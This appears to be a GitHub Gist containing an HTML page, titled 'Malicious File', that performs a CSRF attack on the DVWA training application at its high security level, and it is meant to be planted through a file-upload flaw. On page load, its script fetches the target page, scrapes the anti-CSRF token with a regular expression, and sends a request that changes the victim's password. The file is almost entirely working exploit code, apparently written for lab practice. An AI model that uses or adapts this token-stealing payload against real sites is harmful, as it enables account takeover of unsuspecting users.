Created
November 23, 2022 04:18
-
-
Save StackZeroSec/910573678fe24979304bd609e1b29072 to your computer and use it in GitHub Desktop.
The CSRF exploit for DVWA with high level of security, it can be loaded thanks to the file upload vulnerability.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <meta charset='utf-8'> | |
| <meta http-equiv='X-UA-Compatible' content='IE=edge'> | |
| <title>Malicious File</title> | |
| </head> | |
| <body onload="change_password()"> | |
| <script> | |
| function change_password(){ | |
| const request = new XMLHttpRequest(); | |
| const url = "http://10.10.174.199/vulnerabilities/csrf/" | |
| request.open("GET", url); | |
| request.onreadystatechange = () => { | |
| if (request.readyState === request.DONE && request.status === 200) { | |
| var response = request.responseText; | |
| var user_token = /[a-f0-9]{32}/g.exec(response)[0] | |
| var payload = "http://10.10.174.199/vulnerabilities/csrf/?password_new=stackzero&password_conf=stackzero&Change=Change&user_token="+user_token; | |
| var second_request = new XMLHttpRequest(); | |
| second_request.open("GET", payload); | |
| second_request.send() | |
| } | |
| }; | |
| request.send() | |
| } | |
| </script> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment